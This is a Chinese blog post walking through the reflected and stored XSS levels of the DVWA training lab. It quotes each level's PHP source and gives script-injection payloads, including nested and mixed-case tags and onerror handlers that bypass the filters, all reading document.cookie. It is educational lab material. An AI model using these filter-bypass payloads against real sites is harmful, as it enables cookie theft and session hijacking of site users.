dvwa

最新推荐文章于 2021-03-25 10:13:49 发布
最新推荐文章于 2021-03-25 10:13:49 发布
阅读量195 收藏
点赞数 2
分类专栏: dvwa 文章标签: xss

DVWA之xss学习

自己的小小思路,有错误请指正

写的是dvwa中的xss,反射型与储存型,进行白盒测试

xss(Reflected)

关卡1:low

源码

 <?php 
	header ("X-XSS-Protection: 0");
	 // Is there any input?
	if( array_key_exists( "name", $_GET ) && $_GET[ 'name' ] != NULL ) {
    	// Feedback for end user
    	      echo '<pre>Hello ' . $_GET[ 'name' ] . '</pre>';
    } 
    ?>

这段代码中的’name’直接输出,并未进行过滤处理;所以我们直接使用JavaScript脚本代码去测试一下

payload:

<script>alert(document.cookie)</script>

关卡2:medium

源码

<?php
// Is there any input?
if( array_key_exists( "name", $_GET ) && $_GET[ 'name' ] != NULL ) {
    // Get input
    $name = str_replace( '<script>', '', $_GET[ 'name' ] ); str_replace()函数替换字符串中的一些字符(区分大小写)
    // Feedback for end user
    echo "<pre>Hello ${name}</pre>";
}
?> 

这里使用str_replace()函数对'name'中的<script>替换为空,但这只过滤了一层<script>,且区分大小写。
我们构造一段payload:
<scr<script>ipt>alert(document.cookie)</scr</script>ipt>
<scR<script>ipt>alert(document.cookie)</scr</script>Ipt>
<SCript>alert(document.cookie)</SCRIPT>
通过叠加标签<script>、大小写来绕过

关卡3:hight

源码:

 <?php
header ("X-XSS-Protection: 0");

// Is there any input?
if( array_key_exists( "name", $_GET ) && $_GET[ 'name' ] != NULL ) {
    // Get input
    $name = preg_replace( '/<(.*)s(.*)c(.*)r(.*)i(.*)p(.*)t/i', '', $_GET[ 'name' ] );
                      //preg_replace 函数执行一个正则表达式的搜索和替换。i是表示不区分大小写
    // Feedback for end user
    echo "<pre>Hello ${name}</pre>";
}
?>

源码中对’name’中进行了正则表达式,进行搜索和替换,<script被过滤掉了,并不区分大小写,但只过滤了这些符号字母,却没有对事进行过略
这是通过事件来构造 payload:

<img src='!' onerror=alert(document.cookie)>

xss(Stored)

关卡1:low

源码:

<?php

if( isset( $_POST[ 'btnSign' ] ) ) {
    // Get input
    $message = trim( $_POST[ 'mtxMessage' ] ); trim()函数:移除字符串两侧的空白字符或其他预定义字符
    $name    = trim( $_POST[ 'txtName' ] );

    // Sanitize message input(清理信息输入)
    $message = stripslashes( $message );
    $message = ((isset($GLOBALS["___mysqli_ston"]) && is_object($GLOBALS["___mysqli_ston"])) ? mysqli_real_escape_string($GLOBALS["___mysqli_ston"],  $message ) : ((trigger_error("[MySQLConverterToo] Fix the mysql_escape_string() call! This code does not work.", E_USER_ERROR)) ? "" : ""));

    // Sanitize name input
    $name = ((isset($GLOBALS["___mysqli_ston"]) && is_object($GLOBALS["___mysqli_ston"])) ? mysqli_real_escape_string($GLOBALS["___mysqli_ston"],  $name ) : ((trigger_error("[MySQLConverterToo] Fix the mysql_escape_string() call! This code does not work.", E_USER_ERROR)) ? "" : ""));

    // Update database
    $query  = "INSERT INTO guestbook ( comment, name ) VALUES ( '$message', '$name' );";
    $result = mysqli_query($GLOBALS["___mysqli_ston"],  $query ) or die( '<pre>' . ((is_object($GLOBALS["___mysqli_ston"])) ? mysqli_error($GLOBALS["___mysqli_ston"]) : (($___mysqli_res = mysqli_connect_error()) ? $___mysqli_res : false)) . '</pre>' );

    //mysql_close();
}
?>

可以看出对有害输入没有任何过滤,直接将用户提交的内容插入数据库,输入点在两个输入框都有
但name那里的输出框的长度只有十,我们通过f12修改为较大的数字在进行插入我们的测试代码
payload:

<a href='javascript:alert(document.cookie)'>
<script>prompt(document.cookie)</script>

关卡2:medium

源码:

<?php

if( isset( $_POST[ 'btnSign' ] ) ) {
    // Get input
    $message = trim( $_POST[ 'mtxMessage' ] );
    $name    = trim( $_POST[ 'txtName' ] );

    // Sanitize message input
    $message = strip_tags( addslashes( $message ) );
    $message = ((isset($GLOBALS["___mysqli_ston"]) && is_object($GLOBALS["___mysqli_ston"])) ? mysqli_real_escape_string($GLOBALS["___mysqli_ston"],  $message ) : ((trigger_error("[MySQLConverterToo] Fix the mysql_escape_string() call! This code does not work.", E_USER_ERROR)) ? "" : ""));
    $message = htmlspecialchars( $message );

    // Sanitize name input
    $name = str_replace( '<script>', '', $name );
    $name = ((isset($GLOBALS["___mysqli_ston"]) && is_object($GLOBALS["___mysqli_ston"])) ? mysqli_real_escape_string($GLOBALS["___mysqli_ston"],  $name ) : ((trigger_error("[MySQLConverterToo] Fix the mysql_escape_string() call! This code does not work.", E_USER_ERROR)) ? "" : ""));

    // Update database
    $query  = "INSERT INTO guestbook ( comment, name ) VALUES ( '$message', '$name' );";
    $result = mysqli_query($GLOBALS["___mysqli_ston"],  $query ) or die( '<pre>' . ((is_object($GLOBALS["___mysqli_ston"])) ? mysqli_error($GLOBALS["___mysqli_ston"]) : (($___mysqli_res = mysqli_connect_error()) ? $___mysqli_res : false)) . '</pre>' );

    //mysql_close();
}
?>

$message = trim( $_POST[ 'mtxMessage' ] );
$name    = trim( $_POST[ 'txtName' ] );
$message = strip_tags( addslashes( $message ) );
$message = htmlspecialchars( $message );
$name = str_replace( '<script>', '', $name );
对$message和$name中的字符串前后两侧的空白字符移除,对$message进行了返回在预定的字符前添加反斜杠的字符串
还对$message进行预定义的字符装换
这段代码对$message做了一些过略和规则,但对$name只过滤了<script>过滤,我们可以在firebug中对$name的长度修改
然后通过大小写,叠加标签的做法,插入测试代码

payload:

<img scr='#' onerror=confirm(document.cookie)>

关卡3:high
源码:

<?php

if( isset( $_POST[ 'btnSign' ] ) ) {
    // Get input
    $message = trim( $_POST[ 'mtxMessage' ] );
    $name    = trim( $_POST[ 'txtName' ] );

    // Sanitize message input
    $message = strip_tags( addslashes( $message ) );
    $message = ((isset($GLOBALS["___mysqli_ston"]) && is_object($GLOBALS["___mysqli_ston"])) ? mysqli_real_escape_string($GLOBALS["___mysqli_ston"],  $message ) : ((trigger_error("[MySQLConverterToo] Fix the mysql_escape_string() call! This code does not work.", E_USER_ERROR)) ? "" : ""));
    $message = htmlspecialchars( $message );

    // Sanitize name input
    $name = preg_replace( '/<(.*)s(.*)c(.*)r(.*)i(.*)p(.*)t/i', '', $name );
    $name = ((isset($GLOBALS["___mysqli_ston"]) && is_object($GLOBALS["___mysqli_ston"])) ? mysqli_real_escape_string($GLOBALS["___mysqli_ston"],  $name ) : ((trigger_error("[MySQLConverterToo] Fix the mysql_escape_string() call! This code does not work.", E_USER_ERROR)) ? "" : ""));

    // Update database
    $query  = "INSERT INTO guestbook ( comment, name ) VALUES ( '$message', '$name' );";
    $result = mysqli_query($GLOBALS["___mysqli_ston"],  $query ) or die( '<pre>' . ((is_object($GLOBALS["___mysqli_ston"])) ? mysqli_error($GLOBALS["___mysqli_ston"]) : (($___mysqli_res = mysqli_connect_error()) ? $___mysqli_res : false)) . '</pre>' );

    //mysql_close();
}

?>

和关卡2:medium一样的过略,但这里吧$name中的标签<script>进行细化过滤,并对大小写过略,
payload:<img scr='#' onerror="confirm(/xss/)">

一起学习一起进步!

参考:
https://www.freebuf.com/articles/web/157953.html
时间:2019.5.7

ID:lolong
关注
  • 2
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
dvwa靶场练习反射型XSS
weixin_43873557的博客
09-10 219
安全等级为Low 复制代码 <?php header ("X-XSS-Protection: 0"); // Is there any input? if( array_key_exists( "name", $_GET ) && $_GET[ 'name' ] != NULL ) { // Feedback for end user echo '<pre>你好 ' . $_GET[ 'name' ] . '</pre>'; } ?> 复
DVWA】反射型XSS_全级别
weixin_45378289的博客
07-03 395
1.low级别 <?php header ("X-XSS-Protection: 0"); // Is there any input? if( array_key_exists( "name", $_GET ) && $_GET[ 'name' ] != NULL ) { // Feedback for end user echo '<pre>Hello ' . $_GET[ 'name' ] . '</pre>'; } ?> 分
DVWA闯关XSS(Reflected)
LainWith的博客
08-28 407
低级难度 源代码: <?php header ("X-XSS-Protection: 0"); // Is there any input? if( array_key_exists( "name", $_GET ) && $_GET[ 'name' ] != NULL ) { // Feedback for end user echo '<pre>Hello ' . $_GET[ 'name' ] . '</pre>'; } ?> 可
XSS Reflected 测试
weixin_30908649的博客
11-04 235
前言 由于最近在做XSS方面的测试,于是找到了DVWA平台进行实验测试,通过这三篇文章让大家了解XSS方面的大概内容,这三篇文章只是把你领进XSS的大门,要想真正深入的学习XSS,你还需要去学习很多东西来提升自己。网站测试分为黑盒测试和白盒测试,在这里采用白盒测试来对网站进行XSS漏洞测试,XSS漏洞分为三种:反射型XSS、存储型XSS、DOM型XSS,分别用三篇文章来进行阐述。...
DVWA-XSS(Reflected)
weixin_44866139的博客
01-31 613
Low 1、查看服务器端源代码 <?php header ("X-XSS-Protection: 0"); // Is there any input? if( array_key_exists( "name", $_GET ) && $_GET[ 'name' ] != NULL ) { // Feedback for end user echo '&l...
DVWA-master.7z 压缩包
最新发布
09-14
DVWA(Damn Vulnerable Web Application)是一个开源的Web应用程序,设计用于帮助安全专业人员测试他们的安全技能和工具,同时也为开发人员提供一个平台来了解常见Web应用漏洞的本质。这个"DVWA-master.7z"压缩包...
DVWA Installation
08-15
**DVWA(Damn Vulnerable Web Application)安装指南** Damn Vulnerable Web Application,简称DVWA,是一个专门为网络安全教育设计的开源Web应用程序。它包含了各种常见Web应用漏洞,如SQL注入、跨站脚本(XSS)、...
DVWA-master.zip
01-04
DVWA:渗透测试与网络安全学习平台》 DVWA(Damn Vulnerable Web Application)是一个用于安全测试和教育目的的开源Web应用程序。它旨在帮助安全专业人员、开发人员和学生了解常见Web应用程序漏洞,并提供实践...
DVWA靶场搭建与使用
09-02
**DVWA靶场搭建与使用** DVWA(Damn Vulnerable Web Application)是一个开源的Web应用程序,专门为网络安全专业人员、开发人员和学生设计,用于学习和练习常见Web应用漏洞的识别和利用。它提供了多种安全漏洞的...
DVWA-2.0.1
09-23
DVWA(Damn Vulnerable Web Application)是一个开源的Web应用程序,旨在为安全专业人员提供一个环境,以便在受控环境中学习和实践网络安全测试技术。DVWA 2.0.1是该应用的一个版本,包含了多种常见的Web应用漏洞,...
Web安全:X-XSS-Protection头(防XSS攻击设置)
热门推荐
TivonaLH的博客
01-11 3万+
1.参考资料链接:https://www.freebuf.com/articles/web/138769.html 2.X-XSS-Protection头的三个值 0: 表示关闭浏览器的XSS防护机制 1:删除检测到的恶意代码, 如果响应报文中没有看到X-XSS-Protection 字段,那么浏览器就认为X-XSS-Protection配置为1,这是浏览器的默认设置 1; mode=bl...
Web安全-XSS漏洞
道阻且长,行则将至。
01-07 8528
跨站脚本(cross site script)为了避免与样式css混淆,所以简称为XSS。XSS是一种经常出现在Web应用中的计算机安全漏洞,也是Web中最主流的攻击方式。那么什么是XSS呢?本文将进行学习、介绍。
网络安全:XSS漏洞
垃圾管理员的垃圾站
09-05 603
前面的几篇文写得有点快了,有些地方囫囵吞枣的划过去。等停下来一段时间,我会慢慢去修改和补充。 现在放慢脚步来一点点的写。 XSS(Cross Site Scripting),又称跨站脚本攻击。看英文,缩写应该是CSS,但是为了区别前端的CSS(Cascading Style Sheets)层叠样式表,改名为XSS。这也算是“晚辈”对“长辈”的尊敬吧,何况你还属于“暗”,人家在...
结合DVWA靶场学习XSS漏洞-盗取cookie
LUOBIKUN的博客
10-06 3000
XSS概述参考前置知识:定义分类反射型XSS:存储型XSSDOM型XSS危害防御练习(DVWA靶场)反射型:DVWA-low一般的XSS攻击重定向:DVWA-mediumDVWA-HighDVWA-Impossible存储型XSSDVWA-low一般的XSS攻击重定向:DVWA-mediumDVWA-low一般的XSS攻击重定向:获取cookieDVWA-mediumDVWA-high 参考 XSS攻击进阶篇——那些年我们看不懂的XSS 通过浏览器编码深入探究XSS绕过 DVWA-XSS学习笔记 前置知识:
DVWA之Reflected XSS(反射型XSS)
谢公子的博客
10-04 7394
目录 Low Medium High Impossible Low 源代码: &lt;?php header ("X-XSS-Protection: 0"); // Is there any input? if( array_key_exists( "name", $_GET ) &amp;&amp; $_GET[ 'name' ] != NULL ) { // Feedb...
XSS漏洞
weixin_44022769的博客
03-25 677
前言 XSS即跨站脚本(Cross Site Script),发生在目标网站中目标用户的浏览器层面上,当用户浏览器渲染整个HTML文档的过程中出现了不被预期的脚本指令并执行时,XSS就会发生。 通俗地总结XSS为:想尽一切办法将你的脚本内容在目标网站中目标用户的浏览器上解析执行即可。 这个“跨”实际上属于浏览器的特性,而不是缺陷,造成“跨”这样的假象是因为绝大多数XSS攻击都会采用嵌入一段远程或者说第三方域上的脚本资源。 使用场景: 直接嵌入html<script>标签中 元素标签事
XSS获取cookie
qq_40273198的博客
11-21 4563
   DVWA XSS获取cookie 反射型 一、LOW 1.被害者已经登录http://127.0.0.1/DVWA/vulnerabilities/xss_r/ 网站,该网站存在xss漏洞。 网站源代码如下:未进行任何过滤 &lt;?php header ("X-XSS-Protection: 0"); // Is there any input? if( array_key...
DVWA之XSS(跨站脚本漏洞)
TenG的博客
11-12 870
前言 本篇文章为DVWA平台XSS(跨站脚本漏洞)类型题目,本篇文章目的为记录自己的作题过程并且希望能够帮到大家,如有错误还请各位师傅指正! 本篇文章会同步至本人博客https://tenghy.gitee.io/teng/ 环境&工具: Windows10、phpstudy 正文 反射型XSS:反射型XSS又叫持久型XSS攻击,是攻击者发送一个带有恶意脚本的URL诱导他人点击,进一步触发脚本在浏览器上面运行。因为需要他人点击,所以链接都会具有诱惑性的名称。 存储型XSS:攻击者通过各种方式把恶意
DVWA之XSS
shannow_123的博客
03-13 1945
xss分类 反射型xss easy 源代码如下 &amp;amp;lt;?php header (&amp;quot;X-XSS-Protection: 0&amp;quot;); // Is there any input? if( array_key_exists( &amp;quot;name&amp;quot;, $_GET ) &amp;amp;amp;&amp
DVWA渗透演练系统入门指南
"Web安全之DVWA入门,适合小白学习的渗透测试入门书籍,详细介绍了DVWA这个渗透演练系统,以及Web安全基础知识和OWASP Top 10漏洞" 本资源是一本针对Web安全入门的电子书,特别关注DVWA(Damn Vulnerable Web ...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值